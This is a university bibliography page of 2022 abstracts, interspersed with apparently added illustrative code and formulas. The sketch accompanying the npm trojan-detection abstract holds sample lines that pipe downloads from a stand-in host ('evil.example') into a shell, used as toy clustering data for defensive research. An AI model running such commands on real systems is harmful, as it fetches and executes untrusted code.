H-BRS Bibliography
Departments, institutes and facilities
- Fachbereich Angewandte Naturwissenschaften (33)
- Fachbereich Wirtschaftswissenschaften (31)
- Fachbereich Ingenieurwissenschaften und Kommunikation (26)
- Fachbereich Informatik (22)
- Institut für Technik, Ressourcenschonung und Energieeffizienz (TREE) (22)
- Internationales Zentrum für Nachhaltige Entwicklung (IZNE) (16)
- Institut für Medienentwicklung und -analyse (IMEA) (10)
- Institut für funktionale Gen-Analytik (IFGA) (10)
- Fachbereich Sozialpolitik und Soziale Sicherung (9)
- Institut für Sicherheitsforschung (ISF) (7)
Document Type
- Article (88)
- Part of a Book (18)
- Conference Object (13)
- Bachelor Thesis (5)
- Report (4)
- Part of Periodical (3)
- Working Paper (3)
- Book review (2)
- Book (monograph, edited volume) (1)
- Master's Thesis (1)
Year of publication
- 2022 (138)
Has Fulltext
- yes (138)
Keywords
- Knowledge Graphs (3)
- Machine Learning (3)
- Well-being (3)
- relaxation (3)
- Agil (2)
- Agilität (2)
- Bioinformatics (2)
- IT-Controlling (2)
- IT-Projektmanagement (2)
- Kanban (2)
While the corporate working world is shifting ever further toward agility, IT controlling still clings to old, classical structures. This work examines whether, and to what extent, agile approaches can be applied in IT controlling. This contribution is a modified version of the article "Agiles IT-Controlling" published in the journal "HMD Praxis der Wirtschaftsinformatik" (https://link.springer.com/article/10.1365/s40702-022-00837-0).
Trojanized software packages used in software supply chain attacks constitute an emerging threat. Unfortunately, there is still a lack of scalable approaches that allow automated and timely detection of malicious software packages, so most detections rest on manual labor and expertise. However, it has been observed that most attack campaigns comprise multiple packages that share the same or similar malicious code. We leverage that fact to automatically reproduce manually identified clusters of known malicious packages that have been used in real-world attacks, thus reducing the need for expert knowledge and manual inspection. Our approach, AST Clustering using MCL to mimic Expertise (ACME), yields promising results with an F1 score of 0.99. Signatures are automatically generated from characteristic code fragments of the clusters and are subsequently used to scan the whole npm registry for unreported malicious packages. We were able to identify and report six malicious packages, which were consequently removed from npm. Our approach can therefore support detection by reducing manual labor and may be employed by maintainers of package repositories to detect possible software supply chain attacks through trojanized software packages.
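The core idea — grouping packages by the structural similarity of their code — can be sketched in a few lines. The snippet below is an illustrative toy, not the authors' ACME pipeline: it compares Python AST node-type sequences with `difflib` and uses greedy single-link clustering as a stand-in for Markov Clustering (MCL); all package names and code snippets are invented.

```python
import ast
from difflib import SequenceMatcher

def ast_signature(source: str) -> list[str]:
    """Flatten a module's AST into a sequence of node-type names."""
    return [type(node).__name__ for node in ast.walk(ast.parse(source))]

def similarity(src_a: str, src_b: str) -> float:
    """Structural similarity in [0, 1] between two code snippets."""
    return SequenceMatcher(None, ast_signature(src_a), ast_signature(src_b)).ratio()

def cluster(snippets: dict[str, str], threshold: float = 0.8) -> list[set[str]]:
    """Greedy single-link clustering: a snippet joins a cluster if it is
    structurally similar to any member (a stand-in for MCL)."""
    clusters: list[set[str]] = []
    for name, src in snippets.items():
        for c in clusters:
            if any(similarity(src, snippets[m]) >= threshold for m in c):
                c.add(name)
                break
        else:
            clusters.append({name})
    return clusters

# Two trojan-like variants sharing structure, plus one benign helper.
samples = {
    "pkg-a": "import os\nos.system('curl evil.example | sh')",
    "pkg-b": "import os\nos.system('wget evil.example -O- | sh')",
    "pkg-c": "def add(a, b):\n    return a + b",
}
print(cluster(samples))
```

With the threshold at 0.8, the two trojan-like variants land in one cluster (their AST shapes are identical even though the payload strings differ) while the benign helper stays separate — mirroring how shared malicious code fragments let whole campaigns be grouped.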
Guzzo et al. (2022) argue that open science practices may marginalize inductive and abductive research and preclude leveraging big data for scientific research. We share their assessment that the hypothetico-deductive paradigm has limitations (see also Staw, 2016) and that big data provide grand opportunities (see also Oswald et al., 2020). However, we arrive at very different conclusions. Rather than opposing open science practices that build on a hypothetico-deductive paradigm, we should take initiative to do open science in a way compatible with the very nature of our discipline, namely by incorporating ambiguity and inductive decision-making. In this commentary, we (a) argue that inductive elements are necessary for research in naturalistic field settings across different stages of the research process, (b) discuss some misconceptions of open science practices that hide or discourage inductive elements, and (c) propose that field researchers can take ownership of open science in a way that embraces ambiguity and induction. We use an example research study to illustrate our points.
Einleitung
(2022)
Buch-Diskurse
(2022)
Vorwort
(2022)
Medien-›Eingriffe‹
(2022)
Was ist ein Labor?
(2022)
Vorwort
(2022)
Bonding wires made of aluminum are the most widely used means of transmitting electrical signals in power electronic devices. During operation, various cyclic mechanical and thermal stresses can lead to fatigue loads and failure of the bonding wires. Predicting or preventing wire failure by design is not yet possible in all cases. The following work presents meaningful fatigue tests on small wire dimensions and investigates the influence of the R-ratio on the lifetime of two different aluminum wires, each with a diameter of 300 μm. The experiments show very reproducible fatigue results with ductile failure behavior. The endurable stress amplitude decreases linearly with increasing stress ratio, which can be displayed in a Smith diagram, even though the applied maximum stresses exceed the initial yield stresses determined by tensile tests. Scaling the fatigue results by the tensile strength indicates that the fatigue level is significantly influenced by the strength of the material. Given these very consistent findings, the development of a generalized fatigue model for predicting the lifetime of bonding wires under arbitrary loading conditions appears possible and will be investigated further.
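For readers unfamiliar with the quantities involved: the stress ratio R relates the minimum and maximum stress of a load cycle, and the reported linear decrease of the endurable amplitude can be written with a generic empirical slope (the symbols below are generic, not taken from the paper):

```latex
% Stress ratio and mean stress of a load cycle
R = \frac{\sigma_{\min}}{\sigma_{\max}}, \qquad
\sigma_m = \frac{\sigma_{\max} + \sigma_{\min}}{2}
         = \sigma_a \, \frac{1+R}{1-R}

% Reported linear decrease of the endurable amplitude with R
% (k > 0 is an empirical slope; \sigma_a(R{=}-1) is the fully
% reversed, zero-mean-stress amplitude)
\sigma_a(R) = \sigma_a(R{=}-1) - k\,(R + 1)
```

A Smith diagram plots the endurable maximum and minimum stresses over the mean stress, which is exactly the representation this linear relation maps onto.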
In young adulthood, important foundations are laid for health later in life. Hence, more attention should be paid to the health measures concerning students. A research field that is relevant to health but hitherto somewhat neglected in the student context is the phenomenon of presenteeism. Presenteeism refers to working despite illness and is associated with negative health and work-related effects. The study attempts to bridge the research gap regarding students and examines the effects of and reasons for this behavior. The consequences of digital learning on presenteeism behavior are moreover considered. A student survey (N = 1036) and qualitative interviews (N = 11) were conducted. The results of the quantitative study show significant negative relationships between presenteeism and health status, well-being, and ability to study. An increased experience of stress and a low level of detachment as characteristics of digital learning also show significant relationships with presenteeism. The qualitative interviews highlighted the aspect of not wanting to miss anything as the most important reason for presenteeism. The results provide useful insights for developing countermeasures to be easily integrated into university life, such as establishing fixed learning partners or the use of additional digital learning material.
Deployment of modern data-driven machine learning methods, most often realized by deep neural networks (DNNs), in safety-critical applications such as health care, industrial plant control, or autonomous driving is highly challenging due to numerous model-inherent shortcomings. These shortcomings are diverse and range from a lack of generalization over insufficient interpretability and implausible predictions to directed attacks by means of malicious inputs. Cyber-physical systems employing DNNs are therefore likely to suffer from so-called safety concerns, properties that preclude their deployment as no argument or experimental setup can help to assess the remaining risk. In recent years, an abundance of state-of-the-art techniques aiming to address these safety concerns has emerged. This chapter provides a structured and broad overview of them. We first identify categories of insufficiencies to then describe research activities aiming at their detection, quantification, or mitigation. Our work addresses machine learning experts and safety engineers alike: The former ones might profit from the broad range of machine learning topics covered and discussions on limitations of recent methods. The latter ones might gain insights into the specifics of modern machine learning methods. We hope that this contribution fuels discussions on desiderata for machine learning systems and strategies on how to help to advance existing approaches accordingly.
In the field of automatic music generation, one of the greatest challenges is consistently generating pieces that the majority of the audience perceives positively, since there is no objective method to determine the quality of a musical composition. However, composing principles, which have been refined for millennia, have shaped the core characteristics of today's music. A hybrid music generation system, mlmusic, that incorporates various static, music-theory-based methods as well as data-driven subsystems is implemented to automatically generate pieces considered acceptable by the average listener. Initially, a MIDI dataset consisting of over 100 hand-picked pieces of various styles and complexities is analysed using basic music theory principles, and the abstracted information is fed into explicitly constrained LSTM networks. For chord progressions, each individual network is specifically trained on a given sequence length, while phrases are created by consecutively predicting each note's offset, pitch and duration. Using these outputs as a composition's foundation, additional musical elements, along with constrained recurrent rhythmic and tonal patterns, are statically generated. Although no survey regarding the pieces' reception could be carried out, the successful generation of numerous compositions of varying complexities suggests that the integration of these fundamentally distinctive approaches might succeed in other branches as well.
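The consecutive next-note prediction described above can be illustrated in drastically simplified form: the sketch below uses a first-order Markov chain over pitches in place of the system's constrained LSTM networks (and ignores offset and duration entirely); the toy corpus and seed pitch are invented.

```python
import random
from collections import defaultdict

def train_markov(melodies):
    """Count pitch-to-pitch transitions in a corpus of melodies
    (pitches given as MIDI note numbers)."""
    counts = defaultdict(lambda: defaultdict(int))
    for melody in melodies:
        for a, b in zip(melody, melody[1:]):
            counts[a][b] += 1
    return counts

def generate(counts, start, length, rng):
    """Generate a phrase by repeatedly sampling the next pitch in
    proportion to the observed transition counts."""
    phrase = [start]
    while len(phrase) < length:
        nxt = counts.get(phrase[-1])
        if not nxt:           # dead end: no observed continuation
            break
        pitches = list(nxt)
        weights = [nxt[p] for p in pitches]
        phrase.append(rng.choices(pitches, weights=weights)[0])
    return phrase

corpus = [[60, 62, 64, 65, 67], [60, 62, 64, 62, 60]]  # toy melodies in C
model = train_markov(corpus)
print(generate(model, 60, 8, random.Random(0)))
```

Every generated transition is one that occurred in the corpus — the same "learn from analysed pieces, then predict note by note" loop, minus the neural network and the music-theory constraints layered on top in the actual system.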
This study investigates the initial stage of the thermo-mechanical crystallization behavior for uni- and biaxially stretched polyethylene. The models are based on a mesoscale molecular dynamics approach. We take constraints that occur in real-life polymer processing into account, especially with respect to the blowing stage of the extrusion blow-molding process. For this purpose, we deform our systems using a wide range of stretching levels before they are quenched. We discuss the effects of the stretching procedures on the micro-mechanical state of the systems, characterized by entanglement behavior and nematic ordering of chain segments. For the cooling stage, we use two different approaches which allow for free or hindered shrinkage, respectively. During cooling, crystallization kinetics are monitored: We precisely evaluate how the interplay of chain length, temperature, local entanglements and orientation of chain segments influence crystallization behavior. Our models reveal that the main stretching direction dominates microscopic states of the different systems. We are able to show that crystallization mainly depends on the (dis-)entanglement behavior. Nematic ordering plays a secondary role.
Modeling of Creep Behavior of Particulate Composites with Focus on Interfacial Adhesion Effect
(2022)
Evaluation of creep compliance of particulate composites using empirical models always provides parameters depending on initial stress and material composition. The effort spent to connect model parameters with physical properties has not resulted in success yet. Further, during the creep, delamination between matrix and filler may occur depending on time and initial stress, reducing an interface adhesion and load transfer to filler particles. In this paper, the creep compliance curves of glass beads reinforced poly(butylene terephthalate) composites were fitted with Burgers and Findley models providing different sets of time-dependent model parameters for each initial stress. Despite the finding that the Findley model performs well in a primary creep, the Burgers model is more suitable if secondary creep comes into play; they allow only for a qualitative prediction of creep behavior because the interface adhesion and its time dependency is an implicit, hidden parameter. As Young’s modulus is a parameter of these models (and the majority of other creep models), it was selected to be introduced as a filler content-dependent parameter with the help of the cube in cube elementary volume approach of Paul. The analysis led to the time-dependent creep compliance that depends only on the time-dependent creep of the matrix and the normalized particle distance (or the filler volume content), and it allowed accounting for the adhesion effect. Comparison with the experimental data confirmed that the elementary volume-based creep compliance function can be used to predict the realistic creep behavior of particulate composites.
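For reference, the two empirical creep models named above are commonly written as follows, for a constant applied stress σ₀ (generic symbols, not the paper's notation: a Maxwell spring/dashpot E_M, η_M in series with a Kelvin–Voigt element E_K, η_K):

```latex
% Findley power law (describes primary creep well):
% \varepsilon_0, A, n are empirical, stress-dependent parameters
\varepsilon(t) = \varepsilon_0 + A\,t^{n}

% Burgers (four-parameter) model; the t/\eta_M term gives the
% steady viscous flow that captures secondary creep
\varepsilon(t) = \sigma_0 \left[ \frac{1}{E_M} + \frac{t}{\eta_M}
  + \frac{1}{E_K}\left(1 - e^{-E_K t / \eta_K}\right) \right]

% Creep compliance in both cases
J(t) = \frac{\varepsilon(t)}{\sigma_0}
```

The contrast drawn in the abstract follows directly from these forms: the Findley power law has no linear-in-t term, whereas the Burgers dashpot term t/η_M grows without bound, which is why it copes better once secondary creep sets in.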
Silicon carbide and graphene possess extraordinary chemical and physical properties. Here, these different systems are linked and the changes in structural and dynamic properties are investigated. For the simulations performed, a classical molecular dynamics (MD) approach was used. In this approach, a graphene layer (N = 240 atoms) was grafted at different distances on top of a 6H-SiC structure (N = 2400 atoms) and onto a 3C-SiC structure (N = 1728 atoms). The distances between the graphene layer and the 6H-SiC are 1.0, 1.3 and 1.5 Å, and the distances between the graphene layer and the 3C-SiC are 2.0, 2.3 and 2.5 Å. Each system was equilibrated at room temperature until no further relaxation was observed. The 6H-SiC structure in combination with graphene proves to be more stable than the combination with 3C-SiC, as is evident from the computed energies. Pair distribution functions were influenced slightly by the graphene layer due to steric and energetic changes, as the small shifts of the C-C distances show. Interactions as well as bonds between graphene and SiC give rise to small shoulders on the high-frequency SiC peaks in the spectra, while the high-frequency peaks of graphene are completely absent.
The following reflections attempt, on the one hand, to think further the work on a specifically media-studies-grounded interpretation of so-called crime fiction, and to place it in the context of a reading that understands the dispositif ›literature and its media‹ as a matter of reference or relation: as the »relation of literature to its media« and/or as the »relation of the media to literature«.
Due to expected positive impacts on business, the application of artificial intelligence has increased widely. The decision-making procedures of those models are often complex and not easily understandable to the company's stakeholders, i.e. the people who have to follow up on recommendations or try to understand automated decisions of a system. This opaqueness and black-box nature might hinder adoption, as users struggle to make sense of, and trust, the predictions of AI models. Recent research on eXplainable Artificial Intelligence (XAI) focused mainly on explaining the models to AI experts with the purpose of debugging and improving model performance. In this article, we explore how such systems could be made explainable to their stakeholders. To do so, we propose a new convolutional neural network (CNN)-based explainable predictive model for product backorder prediction in inventory management. Backorders are orders that customers place for products that are currently not in stock. The company then takes the risk of producing or acquiring the backordered products while, in the meantime, customers can cancel their orders if this takes too long, leaving the company with unsold items in its inventory. Hence, for their strategic inventory management, companies need to make decisions based on assumptions. Our argument is that these tasks can be improved by offering explanations for AI recommendations. Hence, our research investigates how such explanations could be provided, employing Shapley additive explanations to explain the overall model's priorities in decision-making. Besides that, we introduce locally interpretable surrogate models that can explain any individual prediction of a model. The experimental results demonstrate effectiveness in predicting backorders in terms of standard evaluation metrics and outperform known related works with an AUC of 0.9489.
Our approach demonstrates how current limitations of predictive technologies can be addressed in the business domain.
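The Shapley-value idea behind such explanations can be demonstrated exactly on a toy model. The snippet below enumerates all feature orderings — feasible only for a handful of features, unlike the approximations used in practice — for a hypothetical linear backorder scorer; the weights, input, and baseline are invented, and this is not the authors' CNN pipeline.

```python
from itertools import permutations

def exact_shapley(features, value):
    """Exact Shapley values: average each feature's marginal contribution
    over all orderings (O(n!) -- only viable for very few features)."""
    phi = {f: 0.0 for f in features}
    orderings = list(permutations(features))
    for order in orderings:
        coalition = set()
        for f in order:
            before = value(coalition)
            coalition.add(f)
            phi[f] += value(coalition) - before
    return {f: phi[f] / len(orderings) for f in phi}

# Hypothetical linear backorder scorer: risk rises with lead time,
# falls with stock level (all values assumed for illustration).
weights = {"lead_time": 0.6, "stock_level": -0.3, "sales_rate": 0.1}
x = {"lead_time": 10.0, "stock_level": 2.0, "sales_rate": 5.0}
baseline = {"lead_time": 4.0, "stock_level": 8.0, "sales_rate": 5.0}

def value(coalition):
    """Model output with features outside the coalition held at baseline."""
    return sum(weights[f] * (x[f] if f in coalition else baseline[f])
               for f in weights)

print(exact_shapley(list(weights), value))
```

For a linear model the result is simply w_f · (x_f − baseline_f) per feature — the additive property that lets such values be read as "how much each feature pushed this prediction away from the baseline".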
Robust Identification and Segmentation of the Outer Skin Layers in Volumetric Fingerprint Data
(2022)
Despite the long history of fingerprint biometrics and its use to authenticate individuals, there are still some unsolved challenges with fingerprint acquisition and presentation attack detection (PAD). Currently available commercial fingerprint capture devices struggle with non-ideal skin conditions, including soft skin in infants. They are also susceptible to presentation attacks, which limits their applicability in unsupervised scenarios such as border control. Optical coherence tomography (OCT) could be a promising solution to these problems. In this work, we propose a digital signal processing chain for segmenting two complementary fingerprints from the same OCT fingertip scan: One fingerprint is captured as usual from the epidermis (“outer fingerprint”), whereas the other is taken from inside the skin, at the junction between the epidermis and the underlying dermis (“inner fingerprint”). The resulting 3D fingerprints are then converted to a conventional 2D grayscale representation from which minutiae points can be extracted using existing methods. Our approach is device-independent and has been proven to work with two different time domain OCT scanners. Using efficient GPGPU computing, it took less than a second to process an entire gigabyte of OCT data. To validate the results, we captured OCT fingerprints of 130 individual fingers and compared them with conventional 2D fingerprints of the same fingers. We found that both the outer and inner OCT fingerprints were backward compatible with conventional 2D fingerprints, with the inner fingerprint generally being less damaged and, therefore, more reliable.
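A heavily simplified sketch of the layer-localization idea: in a single OCT depth profile (A-scan), the air–epidermis surface and the epidermis–dermis junction appear as strong reflections, so a toy segmenter can pick the two strongest local maxima. This illustrates the concept only — it is not the paper's signal processing chain — and the synthetic profile below is invented.

```python
def local_maxima(profile, min_height):
    """Indices of samples higher than both neighbours and above a threshold."""
    return [i for i in range(1, len(profile) - 1)
            if profile[i] > profile[i - 1]
            and profile[i] > profile[i + 1]
            and profile[i] >= min_height]

def skin_layers(a_scan, min_height=0.5):
    """Toy segmentation of one A-scan: the two strongest local maxima are
    taken as the outer surface and the epidermis-dermis junction."""
    peaks = sorted(local_maxima(a_scan, min_height),
                   key=lambda i: a_scan[i], reverse=True)[:2]
    surface, junction = sorted(peaks)  # shallower peak = outer surface
    return surface, junction

# Synthetic A-scan: low background with reflections at depths 20 and 55.
a_scan = [0.05] * 100
a_scan[20] = 1.0   # air-epidermis interface ("outer fingerprint")
a_scan[55] = 0.8   # epidermis-dermis junction ("inner fingerprint")
print(skin_layers(a_scan))
```

Running such a detector on every A-scan of a volume yields two depth maps, from which the outer and inner 3D fingerprints can then be flattened to conventional 2D representations.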
The implementation of the Sustainable Development Goals (SDGs) and the conservation and protection of nature are among the greatest challenges facing urban regions. There are few approaches so far that link the SDGs to natural diversity and related ecosystem services at the local level and track them as measures of progress toward sustainable development. We want to close this gap by developing a set of indicators that capture ecosystem services in the sense of the SDGs and are based on data freely available throughout Germany and Europe. Based on 10 SDGs and 35 SDG indicators, we develop an ecosystem-service- and biodiversity-related indicator set for the evaluation of sustainable development in urban areas. We further show that it is possible to close many of the data gaps between SDGs and locally collected data mentioned in the literature and to translate the universal SDGs to the local level. As an example, we develop this set of indicators for the Bonn/Rhein-Sieg metropolitan area in North Rhine-Westphalia, Germany, which comprises both rural and densely populated settlements. This set of indicators can also help improve communication and plan sustainable development by increasing transparency in local sustainability, implementing a visible sustainability monitoring system, and strengthening the collaboration between local stakeholders.
The visual and auditory quality of computer-mediated stimuli for virtual and extended reality (VR/XR) is rapidly improving. Still, it remains challenging to provide a fully embodied sensation and awareness of objects surrounding, approaching, or touching us in a 3D environment, though it can greatly aid task performance in a 3D user interface. For example, feedback can provide warning signals for potential collisions (e.g., bumping into an obstacle while navigating) or pinpoint areas where one's attention should be directed (e.g., points of interest or danger). These events inform our motor behaviour and are often associated with perception mechanisms tied to our so-called peripersonal and extrapersonal space models, which relate our body to object distance, direction, and contact point/impact. We will discuss these reference spaces to explain the role of different cues in the motor action responses that underlie 3D interaction tasks. However, providing proximity and collision cues can be challenging. Various full-body vibration systems have been developed that stimulate body parts other than the hands, but they can have limitations in applicability and feasibility due to their cost and effort to operate, as well as hygienic considerations associated with, e.g., Covid-19. Informed by results of a prior study using low frequencies for collision feedback, in this paper we look at an unobtrusive way to provide spatial, proximal, and collision cues. Specifically, we assess the potential of foot sole stimulation to provide cues about object direction and relative distance, as well as collision direction and force of impact. Results indicate that in particular vibration-based stimuli could be useful within the frame of peripersonal and extrapersonal space perception that supports 3DUI tasks. Current results favor the feedback combination of continuous vibrotactor cues for proximity and bass-shaker cues for body collision.
Results show that users could rather easily judge the different cues at a reasonably high granularity. This granularity may be sufficient to support common navigation tasks in a 3DUI.
SLC6A14 (ATB0,+) is unique among SLC proteins in its ability to transport 18 of the 20 proteinogenic (dipolar and cationic) amino acids and naturally occurring and synthetic analogues (including anti-viral prodrugs and nitric oxide synthase (NOS) inhibitors). SLC6A14 mediates amino acid uptake in multiple cell types where increased expression is associated with pathophysiological conditions including some cancers. Here, we investigated how a key position within the core LeuT-fold structure of SLC6A14 influences substrate specificity. Homology modelling and sequence analysis identified the transmembrane domain 3 residue V128 as equivalent to a position known to influence substrate specificity in distantly related SLC36 and SLC38 amino acid transporters. SLC6A14, with and without V128 mutations, was heterologously expressed and function determined by radiotracer solute uptake and electrophysiological measurement of transporter-associated current. Substituting the amino acid residue occupying the SLC6A14 128 position modified the binding pocket environment and selectively disrupted transport of cationic (but not dipolar) amino acids and related NOS inhibitors. By understanding the molecular basis of amino acid transporter substrate specificity we can improve knowledge of how this multi-functional transporter can be targeted and how the LeuT-fold facilitates such diversity in function among the SLC6 family and other SLC amino acid transporters.
The following work presents algorithms for semi-automatic validation, feature extraction and ranking of time series measurements acquired from MOX gas sensors. Semi-automatic measurement validation is accomplished by extending established curve similarity algorithms with a slope-based signature calculation. Furthermore, a feature-based ranking metric is introduced. It allows for individual prioritization of each feature and can be used to find the best performing sensors regarding multiple research questions. Finally, the functionality of the algorithms, as well as the developed software suite, are demonstrated with an exemplary scenario, illustrating how to find the most power-efficient MOX gas sensor in a data set collected during an extensive screening consisting of 16,320 measurements, all taken with different sensors at various temperatures and analytes.
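A minimal sketch of such a feature-based ranking metric, assuming min–max-normalized features and a user-chosen weight per feature to encode the research question (e.g., a strongly negative weight on power draw to find the most power-efficient sensor). Sensor names, feature values, and the exact normalization are invented — this is not the paper's metric.

```python
def rank_sensors(feature_table, weights):
    """Score each sensor by a weighted sum of min-max normalized features.
    Negative weights penalize a feature (e.g. power consumption)."""
    names = list(weights)
    lo = {f: min(row[f] for row in feature_table.values()) for f in names}
    hi = {f: max(row[f] for row in feature_table.values()) for f in names}
    def norm(f, v):
        return 0.0 if hi[f] == lo[f] else (v - lo[f]) / (hi[f] - lo[f])
    scores = {s: sum(weights[f] * norm(f, row[f]) for f in names)
              for s, row in feature_table.items()}
    return sorted(scores, key=scores.get, reverse=True)

# Hypothetical features extracted per sensor: higher sensitivity is good,
# lower power draw is good -- the weights encode that trade-off.
sensors = {
    "MOX-1": {"sensitivity": 0.9, "power_mw": 45.0},
    "MOX-2": {"sensitivity": 0.7, "power_mw": 20.0},
    "MOX-3": {"sensitivity": 0.8, "power_mw": 60.0},
}
ranking = rank_sensors(sensors, {"sensitivity": 1.0, "power_mw": -2.0})
print(ranking)
```

Changing only the weight vector re-ranks the same extracted features for a different research question — the per-feature prioritization the abstract describes.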
The cube in cube approach was used by Paul and Ishai-Cohen to model and derive formulas for the filler-content-dependent Young's moduli of particle-filled composites, assuming perfect filler–matrix adhesion. Their formulas were chosen because of their simplicity and recalculated using an elementary volume (EV) approach, which transforms spherical inclusions into cubic inclusions. The EV approach led to an expression for the composite's modulus that allows introducing an adhesion factor kadh between 0 and 1 to take into account reduced filler–matrix adhesion. This adhesion factor scales the edge length of the cubic inclusions, thus reducing the stress transfer area between matrix and filler. Fitting the experimental data with the modified Paul model provides reasonable kadh values for PA66, PBT, PP, PE-LD and BR, which are in line with their surface energies. Further analysis showed that stiffening only occurs if kadh exceeds [Formula: see text] and depends on the ratio of matrix modulus and filler modulus. The modified model allows for a quick calculation of any particle-filled composite for known matrix modulus EM, filler modulus EF, filler volume content vF, and adhesion factor kadh. Thus, finite element analysis (FEA) simulations of any particle-filled polymer parts, as well as materials selection, are significantly eased. FEA of cubic and hexagonal EV arrangements shows that stress distributions within the EV exhibit more shear stresses the further one deviates from the cubic arrangement. At high filler contents, the assumption that the property of the EV is representative for the whole composite holds only for filler volume contents up to 15 or 20% (corresponding to 30 to 40 weight %). Thus, for the vast majority of commercially available particulate composites, the modified model can be applied.
Furthermore, this indicates that the cube in cube approach reaches two limits: (i) the occurrence of increasing shear stresses at filler contents above 20% due to deviations of EV arrangements or spatial filler distribution from cubic arrangements (singular), and (ii) increasing interaction between particles with the formation of particle network within the matrix violating the EV assumption of their homogeneous dispersion.
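Paul's cube-in-cube estimate can be sketched as a small function. The adhesion-factor modification below — scaling the effective stress-transfer area by kadh² — is a plausible reading of the approach described above, not the paper's exact modified expression; the material values are assumed, not taken from the study.

```python
def paul_modulus(e_matrix, e_filler, v_f, k_adh=1.0):
    """Paul's cube-in-cube estimate of a particulate composite's Young's
    modulus, with a crude adhesion factor k_adh in [0, 1] scaling the
    effective stress-transfer cross-section (k_adh = 1: perfect adhesion).
    Sketch only -- not the paper's exact modified expression."""
    m = e_filler / e_matrix                      # modulus ratio EF / EM
    a = (k_adh ** 2) * v_f ** (2.0 / 3.0)        # effective transfer area
    return e_matrix * (1 + (m - 1) * a) / (1 + (m - 1) * (a - k_adh**2 * v_f))

# PBT matrix (~2.5 GPa) with 20 vol% glass beads (~70 GPa); values assumed.
print(round(paul_modulus(2.5, 70.0, 0.20), 2))
```

The limiting behavior matches the physics sketched in the abstract: at vF = 0 or kadh = 0 (no load transfer) the composite modulus collapses to the matrix modulus, and reducing kadh at fixed filler content lowers the predicted stiffening.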
The purpose of the study is to provide empirical evidence about the under-researched area of university–government relations in building a culture of entrepreneurial initiatives inside the triple helix model in a rural region. The study deploys a qualitative case study research method based on the content analysis of project documentation and further internal documents both from universities and municipalities. The propositions in the research question are guided by the previous literature and were then analyzed through an “open coding” process to iteratively analyze, verify, and validate the results from the documents against the previous literature. Results presented in the case study are related both to the project of a municipality–university innovation partnership, as well as the historic development of the university in its three missions, and, related to the important third mission, themes relevant for the project. In addition, a “toolkit” of relevant project activities is presented against the major identified themes, major project stakeholders, as well as relevant Sustainable Development Goals (SDGs). Universities should look beyond a purely economic contribution and should augment all three missions (teaching, research, engagement) by considering the social, environmental, and economic aspects of their activities. Instead of considering a government’s role solely as that of a regulator, a much more creative and purposeful cooperation between university and government is possible for creating a regional culture of entrepreneurial initiatives in a rural region.
Shaping off-job life is becoming increasingly important for workers to increase and maintain their optimal functioning (i.e., feeling and performing well). Proactively shaping the job domain (referred to as job crafting) has been extensively studied, but crafting in the off-job domain has received markedly less research attention. Based on the Integrative Needs Model of Crafting, needs-based off-job crafting is defined as workers’ proactive and self-initiated changes in their off-job lives, which target psychological needs satisfaction. Off-job crafting is posited as a possible means for workers to fulfill their needs and enhance well-being and performance over time. We developed a new scale to measure off-job crafting and examined its relationships to optimal functioning in different work contexts in different regions around the world (the United States, Germany, Austria, Switzerland, Finland, Japan, and the United Kingdom). Furthermore, we examined the criterion, convergent, incremental, discriminant, and structural validity evidence of the Needs-based Off-job Crafting Scale using multiple methods (longitudinal and cross-sectional survey studies, an “example generation”-task). The results showed that off-job crafting was related to optimal functioning over time, especially in the off-job domain but also in the job domain. Moreover, the novel off-job crafting scale had good convergent and discriminant validity, internal consistency, and test–retest reliability. To conclude, our series of studies in various countries show that off-job crafting can enhance optimal functioning in different life domains and support people in performing their duties sustainably. Therefore, shaping off-job life may be beneficial in an intensified and continually changing and challenging working life.
From Conclusion to Coda
(2022)
That the extensive commercial data harvesting by the big internet companies is not solely a problem for the citizens affected by it, but ultimately also has far-reaching social consequences, became a topic of discussion, at least in expert circles, with the rise of right-wing populism in the USA, Brazil, and Europe. Online hate and incitement, fake news, political campaign advertising, and manipulation on social media have become an unmistakable threat to liberal democracies of the Western type.
Breaking new ground and setting new trends in research, teaching and transfer - this is what the Hochschule Bonn-Rhein-Sieg (H-BRS) managed to do last year despite the Corona pandemic. Talents, ideas and cooperations have come to fruition in various ways, always in close exchange between applied science, society and business. "expand" is therefore the motto of the annual report of the H-BRS for the year 2021, which has now been published.
Designing training in nine process steps! Digitalization of the master's module "Integrierte Managementsysteme" in the degree program "Material Science and Sustainability Methods" at the Department of Natural Sciences of Hochschule Bonn-Rhein-Sieg. Using the example of a course taught face-to-face for many years, with lectures and seminar-style exercises, it is shown how designing and delivering instruction that conveys exam-relevant competencies can also succeed "online". An appropriate "setting" of the teaching and learning process, observing quality criteria and recommended practices, is relevant for any kind of training in universities, public authorities, companies, and other organizations.
Emotions are associated with the genesis of visually induced motion sickness in virtual reality
(2022)
Visually induced motion sickness (VIMS) is a well-known side effect of virtual reality (VR) immersion, with symptoms including nausea, disorientation, and oculomotor discomfort. Previous studies have shown that pleasant music, odor, and taste can mitigate VIMS symptomatology, but the mechanism by which this occurs remains unclear. We predicted that positive emotions influence the VIMS-reducing effects. To investigate this, we conducted an experimental study with 68 subjects divided into two groups. The groups were exposed to either positive or neutral emotions before and during the VIMS-provoking stimulus. Otherwise, they performed exactly the same task of estimating the time-to-contact while confronted with a VIMS-provoking moving starfield stimulation. Emotions were induced by means of pre-tested videos and with International Affective Picture System (IAPS) images embedded in the starfield simulation. We monitored emotion induction before, during, and after the simulation, using the Self-Assessment Manikin (SAM) valence and arousal scales. VIMS was assessed before and after exposure using the Simulator Sickness Questionnaire (SSQ) and during simulation using the Fast Motion Sickness Scale (FMS) and FMS-D for dizziness symptoms. VIMS symptomatology did not differ between groups, but valence and arousal were correlated with perceived VIMS symptoms. For instance, reported positive valence prior to VR exposure was found to be related to milder VIMS symptoms and, conversely, experienced symptoms during simulation were negatively related to subjects’ valence. This study sheds light on the complex and potentially bidirectional relationship of VIMS and emotions and provides starting points for further research on the use of positive emotions to prevent VIMS.
